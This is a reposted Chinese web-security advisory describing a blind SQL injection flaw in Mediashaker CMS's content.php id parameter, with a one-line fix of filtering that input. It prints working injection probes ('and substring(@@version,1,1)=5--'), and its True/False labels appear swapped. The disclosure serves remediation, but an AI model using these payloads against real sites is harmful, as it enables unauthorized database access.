Mediashaker盲注缺陷及修复 - 网站安全

Mediashaker盲注缺陷及修复 - 网站安全 - 自学php

来源：自学PHP网时间：2015-04-17 13:03 作者：阅读:次

[导读] 标题: Mediashaker Blind SQL Injection Vulnerabilitiy作者: H4ckCity Security Team www.2cto.com WwW.H4ckCity.Org影响所有版本开发者: http://www.mediashaker.com/测试平台: GNU/Linux Ubuntu......

标题: Mediashaker Blind SQL Injection Vulnerabilitiy
作者: H4ckCity Security Team www.2cto.com WwW.H4ckCity.Org
影响所有版本
开发者: http://www.mediashaker.com/
测试平台: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
示例测试

http://www.2cto.com /content.php?id=1 [Blind SQL]
#
#
# Test Blind SQL Injection in MYSQL Version 5:
#
#
# False
#
# http://wwww.2cto.com/content.php?id=1 and substring(@@version,1,1)=5--
#
# True
#
# http://www.2cto.com/content.php?id=1 and substring(@@version,1,1)=4--
#
# 修复

过滤content.php页面id参数输入

Posse Softball Director CMS SQL注射缺陷及修复 - 网站安

Sql Server 手工注入总结（显错模式） - 网站安全

子栏目

Mediashaker盲注缺陷及修复 - 网站安全 - 自学php

最新评论

添加评论

更多文章推荐

添加评论